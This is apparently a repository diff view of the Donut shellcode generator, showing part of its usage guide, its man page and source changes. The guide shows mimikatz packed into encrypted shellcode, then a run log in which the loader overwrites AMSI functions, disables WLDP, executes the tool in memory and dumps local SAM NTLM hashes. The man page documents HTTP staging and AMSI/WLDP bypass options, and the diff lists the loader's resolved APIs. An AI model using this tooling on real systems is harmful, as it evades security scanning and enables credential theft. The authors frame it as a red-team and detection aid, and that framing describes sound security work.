630 DEBUG: donut.c:960:build_instance(): Copying strings required to replace command line.
631 DEBUG: donut.c:968:build_instance(): Copying strings required to intercept exit-related API
632 DEBUG: donut.c:1018:build_instance(): Copying module data to instance
633 DEBUG: donut.c:1024:build_instance(): Encrypting instance
634 DEBUG: donut.c:1042:build_instance(): Leaving with error : 0
635 DEBUG: donut.c:1210:build_loader(): Inserting opcodes
636 DEBUG: donut.c:1248:build_loader(): Copying 29548 bytes of x86 + amd64 shellcode
637 DEBUG: donut.c:1090:save_loader(): Saving instance 0000024E9DE90080 to file. 483718 bytes.
638 DEBUG: donut.c:1061:save_file(): Entering.
639 DEBUG: donut.c:1065:save_file(): Writing 483718 bytes of 0000024E9DE90080 to instance
640 DEBUG: donut.c:1070:save_file(): Leaving with error : 0
641 DEBUG: donut.c:1139:save_loader(): Saving loader as binary
642 DEBUG: donut.c:1172:save_loader(): Leaving with error : 0
643 DEBUG: donut.c:1540:DonutCreate(): Leaving with error : 0
644 [ Instance type : Embedded
645 [ Module file : "mimikatz.exe"
646 [ Entropy : Random names + Encryption
647 [ Compressed : Xpress Huffman (Reduced by 53%)
648 [ File type : EXE
649 [ Parameters : lsadump::sam exit
650 [ Target CPU : x86+amd64
651 [ AMSI/WDLP : continue
652 [ Shellcode : "loader.bin"
653 DEBUG: donut.c:1556:DonutDelete(): Entering.
654 DEBUG: donut.c:1562:DonutDelete(): Releasing memory for module.
655 DEBUG: donut.c:1568:DonutDelete(): Releasing memory for configuration.
656 DEBUG: donut.c:1574:DonutDelete(): Releasing memory for loader.
657 DEBUG: donut.c:289:unmap_file(): Releasing compressed data.
658 DEBUG: donut.c:294:unmap_file(): Unmapping input file.
659 DEBUG: donut.c:299:unmap_file(): Closing input file.
660 DEBUG: donut.c:1580:DonutDelete(): Leaving.
661 </pre>
662
663 <p>If successfully created, there should now be a file called "instance" in the same directory as the loader. Pass the instance file as a parameter to loader.exe which should also be in the same directory.</p>
664
665 <pre>
666 C:\hub\donut>loader instance
667 Running...
668 DEBUG: loader/loader.c:109:MainProc(): Maru IV : 546E2FF018FD2A54
669 DEBUG: loader/loader.c:112:MainProc(): Resolving address for VirtualAlloc() : E445DF6F06219E85
670 DEBUG: loader/loader.c:116:MainProc(): Resolving address for VirtualFree() : C6C992D6040B85A8
671 DEBUG: loader/loader.c:120:MainProc(): Resolving address for RtlExitUserProcess() : E20BCE2C11E82C7B
672 DEBUG: loader/loader.c:129:MainProc(): VirtualAlloc : 00007FFFD1DAA190 VirtualFree : 00007FFFD1DAA180
673 DEBUG: loader/loader.c:131:MainProc(): Allocating 483718 bytes of RW memory
674 DEBUG: loader/loader.c:143:MainProc(): Copying 483718 bytes of data to memory 00000178FEA30000
675 DEBUG: loader/loader.c:147:MainProc(): Zero initializing PDONUT_ASSEMBLY
676 DEBUG: loader/loader.c:156:MainProc(): Decrypting 483718 bytes of instance
677 DEBUG: loader/loader.c:163:MainProc(): Generating hash to verify decryption
678 DEBUG: loader/loader.c:165:MainProc(): Instance : 33C49D5864287AEF | Result : 33C49D5864287AEF
679 DEBUG: loader/loader.c:172:MainProc(): Resolving LoadLibraryA
680 DEBUG: loader/loader.c:189:MainProc(): Loading ole32
681 DEBUG: loader/loader.c:189:MainProc(): Loading oleaut32
682 DEBUG: loader/loader.c:189:MainProc(): Loading wininet
683 DEBUG: loader/loader.c:189:MainProc(): Loading mscoree
684 DEBUG: loader/loader.c:189:MainProc(): Loading shell32
685 DEBUG: loader/loader.c:193:MainProc(): Resolving 48 API
686 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EF2C0663C0CDDC21
687 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D40916771ECED480
688 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E445DF6F06219E85
689 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C6C992D6040B85A8
690 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 556BF46109D12C9E
691 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 032546126BB99713
692 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for DEB476FF0E3D71E8
693 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A0DD238846F064F4
694 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 03DE3865FC2DF17B
695 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 40FCB82879AAB610
696 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 954101E48C1D54F5
697 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 18669E0FDC3FD0B8
698 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EB6E7C47D574D9F9
699 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EFD410EF534D57C3
700 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A5AA007611CB6580
701 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEC16DD247A68A
702 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6B140B7B87F27359
703 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C2FA65C58C68FC6C
704 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for ED5A331176BB8DDA
705 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EA0D8BE258DC67DA
706 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 3A7BBDEAA1DC3354
707 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EEB92DFE18B7C306
708 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 687DD816E578C4E7
709 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for B0F95D86327741EC
710 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for BDD70375BB72B131
711 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E74A4DD56C6B3154
712 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 527C502C0BC36267
713 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 055C3E8A4CF21475
714 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4D1965E404D783BA
715 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for CC736E0143DB8F2A
716 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C87BFE8578BB0049
717 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FC7CC8D82764DFBF
718 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6F6432B588D39C8D
719 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 2828FB8F68349704
720 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 9752F1AA167F8E79
721 DEBUG: peb.c:87:FindExport(): 9752f1aa167f8e79 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
722 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
723 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
724 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 8211344A519AF3BA
725 DEBUG: peb.c:87:FindExport(): 8211344a519af3ba is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
726 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
727 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
728 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FF0605E1258BEE44
729 DEBUG: peb.c:87:FindExport(): ff0605e1258bee44 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
730 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
731 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
732 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEDA5C642834D7
733 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A69EAF72442222A4
734 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4DBA40D90962E1D6
735 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A1143A47656B2526
736 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 62FF88CDC045477E
737 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E20BCE2C11E82C7B
738 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A469294ED1E1D8DC
739 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 61E26E7C5DD38D2C
740 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 145C8CF24F5EAF3E
741 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 12ACA3AD3CC20AF5
742 DEBUG: loader/loader.c:218:MainProc(): Module is embedded.
743 DEBUG: bypass.c:112:DisableAMSI(): Length of AmsiScanBufferStub is 36 bytes.
744 DEBUG: bypass.c:122:DisableAMSI(): Overwriting AmsiScanBuffer
745 DEBUG: bypass.c:137:DisableAMSI(): Length of AmsiScanStringStub is 36 bytes.
746 DEBUG: bypass.c:147:DisableAMSI(): Overwriting AmsiScanString
747 DEBUG: loader/loader.c:226:MainProc(): DisableAMSI OK
748 DEBUG: bypass.c:326:DisableWLDP(): Length of WldpQueryDynamicCodeTrustStub is 20 bytes.
749 DEBUG: bypass.c:350:DisableWLDP(): Length of WldpIsClassInApprovedListStub is 36 bytes.
750 DEBUG: loader/loader.c:232:MainProc(): DisableWLDP OK
751 DEBUG: loader/loader.c:239:MainProc(): Compression engine is 5
752 DEBUG: loader/loader.c:242:MainProc(): Allocating 1015240 bytes of memory for decompressed file and module information
753 DEBUG: loader/loader.c:252:MainProc(): Duplicating DONUT_MODULE
754 DEBUG: loader/loader.c:256:MainProc(): Decompressing 478726 -> 1013912
755 DEBUG: loader/loader.c:270:MainProc(): WorkSpace size : 1415999 | Fragment size : 5161
756 DEBUG: loader/loader.c:277:MainProc(): Decompressing with RtlDecompressBufferEx(XPRESS HUFFMAN)
757 DEBUG: loader/loader.c:302:MainProc(): Checking type of module
758 DEBUG: inmem_pe.c:103:RunPE(): Allocating 1019904 (0xf9000) bytes of RWX memory for file
759 DEBUG: inmem_pe.c:112:RunPE(): Copying Headers
760 DEBUG: inmem_pe.c:115:RunPE(): Copying each section to RWX memory 00000178FF170000
761 DEBUG: inmem_pe.c:127:RunPE(): Applying Relocations
762 DEBUG: inmem_pe.c:151:RunPE(): Processing the Import Table
763 DEBUG: inmem_pe.c:159:RunPE(): Loading ADVAPI32.dll
764 DEBUG: inmem_pe.c:159:RunPE(): Loading Cabinet.dll
765 DEBUG: inmem_pe.c:159:RunPE(): Loading CRYPT32.dll
766 DEBUG: inmem_pe.c:159:RunPE(): Loading cryptdll.dll
767 DEBUG: inmem_pe.c:159:RunPE(): Loading DNSAPI.dll
768 DEBUG: inmem_pe.c:159:RunPE(): Loading FLTLIB.DLL
769 DEBUG: inmem_pe.c:159:RunPE(): Loading NETAPI32.dll
770 DEBUG: inmem_pe.c:159:RunPE(): Loading ole32.dll
771 DEBUG: inmem_pe.c:159:RunPE(): Loading OLEAUT32.dll
772 DEBUG: inmem_pe.c:159:RunPE(): Loading RPCRT4.dll
773 DEBUG: inmem_pe.c:159:RunPE(): Loading SHLWAPI.dll
774 DEBUG: inmem_pe.c:159:RunPE(): Loading SAMLIB.dll
775 DEBUG: inmem_pe.c:159:RunPE(): Loading Secur32.dll
776 DEBUG: inmem_pe.c:159:RunPE(): Loading SHELL32.dll
777 DEBUG: inmem_pe.c:159:RunPE(): Loading USER32.dll
778 DEBUG: inmem_pe.c:159:RunPE(): Loading USERENV.dll
779 DEBUG: inmem_pe.c:159:RunPE(): Loading VERSION.dll
780 DEBUG: inmem_pe.c:159:RunPE(): Loading HID.DLL
781 DEBUG: inmem_pe.c:159:RunPE(): Loading SETUPAPI.dll
782 DEBUG: inmem_pe.c:159:RunPE(): Loading WinSCard.dll
783 DEBUG: inmem_pe.c:159:RunPE(): Loading WINSTA.dll
784 DEBUG: inmem_pe.c:159:RunPE(): Loading WLDAP32.dll
785 DEBUG: inmem_pe.c:159:RunPE(): Loading advapi32.dll
786 DEBUG: inmem_pe.c:159:RunPE(): Loading msasn1.dll
787 DEBUG: inmem_pe.c:159:RunPE(): Loading ntdll.dll
788 DEBUG: inmem_pe.c:159:RunPE(): Loading netapi32.dll
789 DEBUG: inmem_pe.c:159:RunPE(): Loading KERNEL32.dll
790 DEBUG: inmem_pe.c:182:RunPE(): Replacing KERNEL32.dll!ExitProcess with ntdll!RtlExitUserThread
791 DEBUG: inmem_pe.c:159:RunPE(): Loading msvcrt.dll
792 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!exit with ntdll!RtlExitUserThread
793 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_cexit with ntdll!RtlExitUserThread
794 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_exit with ntdll!RtlExitUserThread
795 DEBUG: inmem_pe.c:196:RunPE(): Processing Delayed Import Table
796 DEBUG: inmem_pe.c:204:RunPE(): Loading bcrypt.dll
797 DEBUG: inmem_pe.c:204:RunPE(): Loading ncrypt.dll
798 DEBUG: inmem_pe.c:319:RunPE(): Setting command line: MTFM lsadump::sam exit
799 DEBUG: inmem_pe.c:433:SetCommandLineW(): Obtaining handle for kernelbase
800 DEBUG: inmem_pe.c:449:SetCommandLineW(): Searching 2161 pointers
801 DEBUG: inmem_pe.c:458:SetCommandLineW(): BaseUnicodeCommandLine at 00007FFFD1609E70 : loader instance
802 DEBUG: inmem_pe.c:466:SetCommandLineW(): New BaseUnicodeCommandLine at 00007FFFD1609E70 : MTFM lsadump::sam exit
803 DEBUG: inmem_pe.c:483:SetCommandLineW(): New BaseAnsiCommandLine at 00007FFFD1609E60 : MTFM lsadump::sam exit
804 DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting ucrtbase.dll!__p__acmdln "loader instance" to "MTFM lsadump::sam exit"
805 DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting ucrtbase.dll!__p__wcmdln "loader instance" to "MTFM lsadump::sam exit"
806 DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting msvcrt.dll!_acmdln "loader instance" to "MTFM lsadump::sam exit"
807 DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting msvcrt.dll!_wcmdln "loader instance" to "MTFM lsadump::sam exit"
808 DEBUG: inmem_pe.c:323:RunPE(): Wiping Headers from memory
809 DEBUG: inmem_pe.c:332:RunPE(): Creating thread for entrypoint of EXE : 00000178FF2007F8
810
811
812 .#####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
813 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
814 ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
815 ## \ / ## > http://blog.gentilkiwi.com/mimikatz
816 '## v ##' Vincent LE TOUX ( [email protected] )
817 '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
818
819 mimikatz(commandline) # lsadump::sam
820 Domain : DESKTOP-B888L2R
821 SysKey : b43927eef0f56833c527ea951c37abc1
822 Local SID : S-1-5-21-1047138248-288568923-692962947
823
824 SAMKey : f1813d42812fcde9c5fe08807370613d
825
826 RID : 000001f4 (500)
827 User : Administrator
828
829 RID : 000001f5 (501)
830 User : Guest
831
832 RID : 000001f7 (503)
833 User : DefaultAccount
834
835 RID : 000001f8 (504)
836 User : WDAGUtilityAccount
837 Hash NTLM: c288f1c30b232571b0222ae6a5b7d223
838
839 RID : 000003e9 (1001)
840 User : john
841 Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c
842
843 RID : 000003ea (1002)
844 User : user
845 Hash NTLM: 5835048ce94ad0564e29a924a03510ef
846
847 RID : 000003eb (1003)
848 User : test
849
850 mimikatz(commandline) # exit
851 Bye!
852
853 DEBUG: inmem_pe.c:338:RunPE(): Process terminated
854 DEBUG: inmem_pe.c:349:RunPE(): Erasing 1019904 bytes of memory at 00000178FF170000
855 DEBUG: inmem_pe.c:353:RunPE(): Releasing memory
856 DEBUG: loader/loader.c:343:MainProc(): Erasing RW memory for instance
857 DEBUG: loader/loader.c:346:MainProc(): Releasing RW memory for instance
858 DEBUG: loader/loader.c:354:MainProc(): Returning to caller
859 </pre>
860
861 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
862
863 <h2 id="loader">13. Extending The Loader</h2>
864
865 <p>Donut was never designed with modularity in mind, however, a new version in future will try to simplify the process of extending the loader, so that others can write their own code for it. Currently, simple changes to the loader can sometimes require lots of changes to the entire code base and this isn't really ideal. If for any reason you want to update the loader to include additional functionality, the following steps are required.</p>
866
867 <h3>1. Declare the function pointers</h3>
868
869 <p>For each API you want the loader to use, declare a function pointer in loader/winapi.h. For example, the <code>Sleep</code> API is declared in its SDK header file as:</p>
870
871 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
872 </pre>
873
874 <p>The function pointer for this would be declared in loader/winapi.h as:</p>
875
876 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>(</span><span style='color:#603000; '>WINAPI</span> <span style='color:#808030; '>*</span>Sleep_t<span style='color:#808030; '>)</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
877 </pre>
878
879 <h3>2. Update the API string array and function pointer array</h3>
880
881 <p>At the moment, Donut resolves API using a 64-bit hash, which is calculated by the generator before being stored in the loader itself. In donut.c is a variable called <var>api_imports</var>, declared as an array of <code>API_IMPORT</code> structures. Each entry contains a case-sensitive API string and corresponding DLL string in lowercase. The <code>Sleep</code> API is exported by kernel32.dll, so if we want the loader to use Sleep, the <code>api_imports</code> must have the following added to it. This array is terminated by an empty entry.</p>
882
883 <pre style='color:#000000;background:#ffffff;'> <span style='color:#800080; '>{</span>KERNEL32_DLL<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>Sleep</span><span style='color:#800000; '>"</span><span style='color:#800080; '>}</span><span style='color:#808030; '>,</span>
884 </pre>
885
886 <p>Of course, KERNEL32_DLL used here is a symbolic constant for "kernel32.dll".</p>
887
888 <p>The <code>DONUT_INSTANCE</code> structure is defined in include/donut.h and one of the fields called <code>api</code> is defined as a union to hold three members. <var>hash</var> is an array of <code>uint64_t</code> integers to hold a 64-bit hash of each API string. <var>addr</var> is an array of <code>void*</code> pointers to hold the address of an API in memory and finally a structure holding all the function pointers. These pointers are placed in the same order as the API strings stored in <var>api_imports</var>. Currently, the <var>api</var> member can hold up to 64 function pointers or hashes, but this can be increased if required.</p>
889
890 <p>Where you place the API string in <var>api_imports</var> is entirely up to you, but it <em>must</em> be in the same order as where the function pointer is placed in the <code>DONUT_INSTANCE</code> structure.</p>
891
892 <h3>3. Update DLL names</h3>
893
894 <p>A number of DLL are already loaded by a process; ntdll.dll, kernel32.dll and kernelbase.dll. For everything else, the instance contains a list of DLL strings loaded before attempting to resolve the address of APIs. The following list of DLLs seperated by semi-colon are loaded prior to resolving API. If the API you want Donut loader to use is exported by a DLL not shown here, you need to add it to the list.</p>
895
896 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// required for each API used by the loader</span>
897 <span style='color:#004a43; '>#</span><span style='color:#004a43; '>define</span><span style='color:#004a43; '> DLL_NAMES </span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>ole32;oleaut32;wininet;mscoree;shell32;dnsapi</span><span style='color:#800000; '>"</span>
898 </pre>
899
900 <h3>4. Calling an API</h3>
901
902 <p>If the API were successfully resolved, simply referencing the function pointer in a pointer to <code>DONUT_INSTANCE</code> is enough to invoke it. The following line of code shows how to call the <code>Sleep</code> API declared earlier.</p>
903
904 <pre style='color:#000000;background:#ffffff;'>inst<span style='color:#808030; '>-</span><span style='color:#808030; '>></span>api<span style='color:#808030; '>.</span><span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#008c00; '>1000</span><span style='color:#808030; '>*</span><span style='color:#008c00; '>5</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
905 </pre>
906
907 <p>Future plans for Donut are to provide multiple options for resolving API; Import Address Table (IAT), Export Address Table (EAT) and <a href="https://modexp.wordpress.com/2019/05/19/shellcode-getprocaddress/">Exception Directory</a> to name a few. It should also be much easier to write custom payloads using the loader.</p>
908
909 </body>
910 </html>
+131
-0
docs/donut.1 less more
0 '\" t
1 .\" Title: donut
2 .\" Author: Odzhan
3 .\" Date: 12/24/2019
4 .\" Manual: Donut Reference Guide
5 .\" Source: Donut
6 .\" Language: English
7 .\"
8 .TH "DONUT" "1" "12/24/2019" "Donut v0.9.3" "Donut Reference Guide"
9 .SH NAME
10 donut \- shellcode generator
11 .SH SYNOPSIS
12 .B donut
13 [options]
14 .IR file ...
15 .SH DESCRIPTION
16 Donut, named after the dotNET framework, generates position-independent code for in-memory execution of VBScript, JScript, EXE/DLL files on the Microsoft Windows operating system. Both managed .NET assemblies and unmanaged/native EXE, DLL files are supported by the loader. There are dynamic and static libraries available for both Windows and Linux.
17 .SH MODULE OPTIONS
18 .TP
19 .BR \-n " " <name>
20 Module name for HTTP staging. If entropy is enabled, this is generated randomly.
21 .TP
22 .BR \-s " " <server>
23 URL for the HTTP server that will host a Donut module.
24 .TP
25 .BR \-e " " <level>
26 Entropy level. 1=None, 2=Generate random names, 3=Generate random names + use symmetric encryption (default).
27 .SH PIC/SHELLCODE OPTIONS
28 .TP
29 .BR \-a " " <arch>
30 Target architecture for loader : 1=x86, 2=amd64, 3=x86+amd64(default).
31 .TP
32 .BR \-b " " <level>
33 Behavior for bypassing AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default).
34 .TP
35 .BR \-o " " <path>
36 Output file to save loader. Default is "loader.bin".
37 .TP
38 .BR \-f " " <format>
39 Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal.
40 .TP
41 .BR \-y " " <addr>
42 Create a new thread for loader and continue execution at address supplied. \fIaddr\fR must be in hexadecimal format.
43 .TP
44 .BR \-x " " <action>
45 Determines how the loader should exit. 1=exit thread (default), 2=exit process.
46 .SH FILE OPTIONS
47 .TP
48 .BR \-c " " <namespace.class>
49 Optional class name. (required for .NET DLL)
50 .TP
51 .BR \-d " " <name>
52 AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
53 .TP
54 .BR \-m " " <method | api>
55 Optional method or function for DLL. (a method is required for .NET DLL)
56 .TP
57 .BR \-p " " <arguments>
58 Optional arguments/command line inside quotations for DLL method/function or EXE.
59 .TP
60 .BR \-w
61 Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
62 .TP
63 .BR \-r " " <version>
64 CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
65 .TP
66 .BR \-t
67 Run the entrypoint of an unmanaged/native EXE as a thread and wait for thread to end.
68 .TP
69 .BR \-z " " <engine>
70 Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress.
71 Compression engines 3 abd 4 are only available on Windows.
72 .SH AUTHORS
73 Odzhan, TheWover
74 .SH DISCLAIMER
75 The authors are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.
76 .SH COPYRIGHT
77 BSD 3-Clause License
78
79 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
80
81 Redistribution and use in source and binary forms, with or without
82 modification, are permitted provided that the following conditions are met:
83
84 * Redistributions of source code must retain the above copyright notice, this
85 list of conditions and the following disclaimer.
86
87 * Redistributions in binary form must reproduce the above copyright notice,
88 this list of conditions and the following disclaimer in the documentation
89 and/or other materials provided with the distribution.
90
91 * Neither the name of the copyright holder nor the names of its
92 contributors may be used to endorse or promote products derived from
93 this software without specific prior written permission.
94
95 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
96 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
97 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
98 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
99 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
100 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
101 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
102 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
103 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
104 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
105 .SH "NOTES"
106 .IP " 1." 4
107 Loading .NET Assemblies From Memory.
108 .RS 4
109 \%https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
110 .RE
111 .IP " 2." 4
112 Donut - Injecting .NET Assemblies as Shellcode
113 .RS 4
114 \%https://thewover.github.io/Introducing-Donut/
115 .RE
116 .IP " 3." 4
117 How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code
118 .RS 4
119 \%https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/
120 .RE
121 .IP " 4." 4
122 In-Memory Execution of DLL
123 .RS 4
124 \%https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/
125 .RE
126 .IP " 5." 4
127 Data Compression
128 .RS 4
129 \%https://modexp.wordpress.com/2019/12/08/shellcode-compression/
130 .RE
+1703
-745
donut.c less more
00 /**
11 BSD 3-Clause License
22
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
3 Copyright (c) 2019-2020, TheWover, Odzhan. All rights reserved.
44
55 Redistribution and use in source and binary forms, with or without
66 modification, are permitted provided that the following conditions are met:
3030
3131 #include "donut.h"
3232
33 #include "payload/payload_exe_x86.h"
34 #include "payload/payload_exe_x64.h"
33 #include "loader_exe_x86.h"
34 #include "loader_exe_x64.h"
3535
3636 #define PUT_BYTE(p, v) { *(uint8_t *)(p) = (uint8_t) (v); p = (uint8_t*)p + 1; }
3737 #define PUT_HWORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 2); p = (uint8_t*)p + 2; }
3838 #define PUT_WORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 4); p = (uint8_t*)p + 4; }
3939 #define PUT_BYTES(p, v, n) { memcpy(p, v, n); p = (uint8_t*)p + n; }
4040
41 // these have to be in same order as DONUT_INSTANCE structure in donut.h
42 static API_IMPORT api_imports[]=
43 {
41 // required for each API used by the loader
42 #define DLL_NAMES "ole32;oleaut32;wininet;mscoree;shell32"
43
44 // These must be in the same order as the DONUT_INSTANCE structure defined in donut.h
45 static API_IMPORT api_imports[] = {
4446 {KERNEL32_DLL, "LoadLibraryA"},
4547 {KERNEL32_DLL, "GetProcAddress"},
4648 {KERNEL32_DLL, "GetModuleHandleA"},
4749 {KERNEL32_DLL, "VirtualAlloc"},
4850 {KERNEL32_DLL, "VirtualFree"},
49 {KERNEL32_DLL, "VirtualQuery"},
50 {KERNEL32_DLL, "VirtualProtect"},
5151 {KERNEL32_DLL, "Sleep"},
5252 {KERNEL32_DLL, "MultiByteToWideChar"},
5353 {KERNEL32_DLL, "GetUserDefaultLCID"},
54
54 {KERNEL32_DLL, "CreateThread"},
55 {KERNEL32_DLL, "CreateFileA"},
56 {KERNEL32_DLL, "GetThreadContext"},
57 {KERNEL32_DLL, "GetCurrentThread"},
58 {KERNEL32_DLL, "GetCurrentProcess"},
59 {KERNEL32_DLL, "GetCommandLineA"},
60 {KERNEL32_DLL, "GetCommandLineW"},
61 {KERNEL32_DLL, "HeapAlloc"},
62 {KERNEL32_DLL, "HeapReAlloc"},
63 {KERNEL32_DLL, "GetProcessHeap"},
64 {KERNEL32_DLL, "HeapFree"},
65 {KERNEL32_DLL, "GetLastError"},
66
67 {SHELL32_DLL, "CommandLineToArgvW"},
68
5569 {OLEAUT32_DLL, "SafeArrayCreate"},
5670 {OLEAUT32_DLL, "SafeArrayCreateVector"},
5771 {OLEAUT32_DLL, "SafeArrayPutElement"},
6781 {WININET_DLL, "InternetConnectA"},
6882 {WININET_DLL, "InternetSetOptionA"},
6983 {WININET_DLL, "InternetReadFile"},
84 {WININET_DLL, "InternetQueryDataAvailable"},
7085 {WININET_DLL, "InternetCloseHandle"},
7186 {WININET_DLL, "HttpOpenRequestA"},
7287 {WININET_DLL, "HttpSendRequestA"},
7994 {OLE32_DLL, "CoCreateInstance"},
8095 {OLE32_DLL, "CoUninitialize"},
8196
82 { NULL, NULL }
97 {NTDLL_DLL, "RtlEqualUnicodeString"},
98 {NTDLL_DLL, "RtlEqualString"},
99 {NTDLL_DLL, "RtlUnicodeStringToAnsiString"},
100 {NTDLL_DLL, "RtlInitUnicodeString"},
101 {NTDLL_DLL, "RtlExitUserThread"},
102 {NTDLL_DLL, "RtlExitUserProcess"},
103 {NTDLL_DLL, "RtlCreateUnicodeString"},
104 {NTDLL_DLL, "RtlGetCompressionWorkSpaceSize"},
105 {NTDLL_DLL, "RtlDecompressBuffer"},
